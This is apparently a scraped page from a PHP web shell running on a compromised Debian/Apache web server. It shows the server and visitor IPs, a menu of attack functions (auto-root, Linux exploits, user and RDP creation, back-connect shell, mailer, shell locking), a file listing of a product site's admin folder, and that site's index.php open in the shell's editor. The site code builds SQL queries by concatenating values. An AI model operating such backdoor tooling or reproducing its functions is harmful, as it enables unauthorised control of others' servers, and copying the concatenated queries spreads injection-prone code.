Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax
[ DIR ]
drwxr-xr-x
app-assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
module
[ DIR ]
drwxr-xr-x
PhpXlsxGenerator.php
54.22
KB
-rw-r--r--
ad_contact_details.php
14.65
KB
-rw-r--r--
add_360_category.php
4.56
KB
-rw-r--r--
add_360_products.php
7.11
KB
-rw-r--r--
add_application.php
5.06
KB
-rw-r--r--
add_blogs.php
8.72
KB
-rw-r--r--
add_brands.php
6.56
KB
-rw-r--r--
add_catalogues.php
7.02
KB
-rw-r--r--
add_collections.php
12.59
KB
-rw-r--r--
add_division.php
8.29
KB
-rw-r--r--
add_effects.php
4.95
KB
-rw-r--r--
add_events.php
10.41
KB
-rw-r--r--
add_gallery.php
8.79
KB
-rw-r--r--
add_main_event.php
8.63
KB
-rw-r--r--
add_multiple_products.php
10.54
KB
-rw-r--r--
add_products.php
28.81
KB
-rw-r--r--
add_series.php
7.45
KB
-rw-r--r--
add_thickness.php
6.63
KB
-rw-r--r--
all_360_category.php
9.63
KB
-rw-r--r--
all_360_products.php
7.63
KB
-rw-r--r--
all_application.php
10.43
KB
-rw-r--r--
all_blogs.php
10.91
KB
-rw-r--r--
all_brands.php
7.07
KB
-rw-r--r--
all_catalogues.php
10.05
KB
-rw-r--r--
all_collections.php
7.01
KB
-rw-r--r--
all_division.php
7.38
KB
-rw-r--r--
all_effects.php
10.26
KB
-rw-r--r--
all_events.php
10.29
KB
-rw-r--r--
all_gallery.php
10.48
KB
-rw-r--r--
all_main_events.php
10
KB
-rw-r--r--
all_products.php
18.18
KB
-rw-r--r--
all_products_new.php
13.4
KB
-rw-r--r--
all_series.php
10.23
KB
-rw-r--r--
all_sub_collections.php
7.4
KB
-rw-r--r--
all_sub_division.php
7.76
KB
-rw-r--r--
all_thickness.php
7.64
KB
-rw-r--r--
divisions.php
486
B
-rw-r--r--
edit_360_category.php
5.04
KB
-rw-r--r--
edit_360_products.php
7.9
KB
-rw-r--r--
edit_application.php
5.88
KB
-rw-r--r--
edit_blogs.php
9.46
KB
-rw-r--r--
edit_brands.php
7.4
KB
-rw-r--r--
edit_catalogue.php
7.95
KB
-rw-r--r--
edit_collections.php
16.95
KB
-rw-r--r--
edit_gallery.php
8.85
KB
-rw-r--r--
edit_main_events.php
9.79
KB
-rw-r--r--
edit_product.php
35.18
KB
-rw-r--r--
edit_series.php
8.98
KB
-rw-r--r--
edit_sub_collections.php
17.26
KB
-rw-r--r--
edit_sub_event.php
10.73
KB
-rw-r--r--
edit_thickness.php
7.58
KB
-rw-r--r--
export_excel.php
4.21
KB
-rw-r--r--
functions.php
523
B
-rw-r--r--
index.php
3.77
KB
-rw-r--r--
login.php
6.83
KB
-rw-r--r--
logout.php
92
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include("include/header.php"); ?> <div class="main-panel"> <!-- BEGIN : Main Content--> <div class="main-content"> <div class="content-wrapper"><!--Statistics cards Starts--> <div class="row match-height"> <?php $sel_query="SELECT * from tbl_collection where parent_id = 0 and visibility = 1"; $result = mysqli_query($conn,$sel_query); while($coll= mysqli_fetch_assoc($result)) { ?> <div class="col-xl-4 col-lg-6 col-6"> <div class="card"> <div class="card-header pb-2"> <h4 class="card-title"><?= $coll['collection_name']; ?></h4> </div> <div class="card-content"> <table class="table table-responsive-sm text-left"> <thead> <tr> <th>Sr. No.</th> <th>Collection Name</th> <th>Products</th> <th>Count</th> <th>Status</th> </tr> </thead> <tbody> <?php $count = 1; $sel_size="SELECT * from tbl_collection where parent_id = '".$coll['collection_id']."'"; $resultsize = mysqli_query($conn,$sel_size); while($size= mysqli_fetch_assoc($resultsize)) { ?> <tr> <td><b>Size no. <?= $count; ?></b></td> <td><b><?= $size['collection_name']; ?></b></td> <td><b><a href="all_products.php?size=<?= $size['collection_id']; ?>" target="_blank">View</a></b></td> <?php $sql = "SELECT count(size_id) as amount_sum from tbl_new_products WHERE size_id = '".$size['collection_id']."' "; $cres = mysqli_query($conn,$sql); $cdata = mysqli_fetch_array($cres); ?> <td><b><?= $cdata["amount_sum"];?></b></td> <?php if ($size['visibility'] == 1) { ?> <td class="success"><b>Enable</b></td> <?php } else { ?> <td class="danger"><b>Disable</b></td> <?php } ?> </tr> <!-- Finish Details --> <?php $count1 = 1; $sel_finish="SELECT * from tbl_collection where parent_id = '".$size['collection_id']."'"; $resultfinish = mysqli_query($conn,$sel_finish); while($finish= mysqli_fetch_assoc($resultfinish)) { ?> <tr> <td>Finish No. <?= $count1; ?></td> <td><?= $finish['collection_name']; ?> <span style="font-size:12px;">(<?= $size['collection_name']; ?>)</span></td> <td><a href="all_products.php?finish=<?= $finish['collection_id']; ?>" target="_blank">View</a></td> <?php $sql = "SELECT count(size_id) as amount_sum from tbl_new_products WHERE finish_id = '".$finish['collection_id']."' "; $cres = mysqli_query($conn,$sql); $cdata = mysqli_fetch_array($cres); ?> <td><b><?= $cdata["amount_sum"];?></b></td> <?php if ($finish['visibility'] == 1) { ?> <td class="success">Enable</td> <?php } else { ?> <td class="danger">Disable</td> <?php } ?> </tr> <?php $count1++; } ?> <!-- Finish Details --> <?php $count++; } ?> </tbody> </table> </div> </div> </div> <?php } ?> </div> </div> </div> <!-- END : End Main Content--> <?php include("include/footer.php"); ?>
Close